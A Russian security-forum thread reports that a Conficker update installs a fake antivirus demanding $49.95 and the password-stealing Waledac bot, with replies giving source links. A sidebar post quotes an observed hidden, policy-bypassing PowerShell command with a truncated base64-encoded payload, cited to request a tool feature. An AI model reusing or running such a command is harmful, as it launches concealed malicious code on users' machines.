Перейти к содержанию

Recommended Posts

Agent

Давно ожидаемое третье пришествие вируса Conficker все-таки произошло — зараженные машины, связанные в единую p2p−сеть, автоматически загрузили обновление для червя. Свежая версия Conficker скачивает из сети целый букет вредоносного ПО.

Так, на пользовательские ПК попадает установочный файл, определяемый защитными программами как FraudTool.Win32.SpywareProtect2009.s. При его запуске на экране появляется симпатичный интерфейс с сообщением о том, что компьютер заражен опасными вирусами. Для полной очистки компьютера фальшивый антивирус требует от пользователя выплатить «всего лишь» $49,95. Естественно, никаких других функций, кроме вымогания денег, подобное ПО не имеет.

Помимо поддельного антивируса на зараженных ПК оказывается приложение Waledac, уже изученное экспертами по безопасности. Оно собирает всевозможные системные пароли, рассылает почтовый спам и подключает компьютер к другим машинам ботнета.

Также стало известно, что вредоносное программное обеспечение изначально распространялось с IP-адресов, принадлежащих Украине. Сейчас вирус продолжает его скачивать уже из других источников.

Подобная эпидемия распространения поддельного антивирусного ПО случилась в 2008 году. По отчетам Microsoft, вирусы Win32/FakeXPA и Win32/FakeSecSen были обнаружены на более чем полутора миллионах компьютеров. По скромным подсчетам специалистов, тогда от запуганных пользователей злоумышленники получали до $10 000 в день.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Agent

А ссылочку можно привести? Для полноты картины.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
p2u
А ссылочку можно привести? Для полноты картины.

Вирус Conficker вымогает деньги.

Другими словами на Веблоге ЛК - автор Александр:

Бесконечная история

Наблюдая за ботами

Наблюдая за ботами-2

(для полноты картины). :)

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×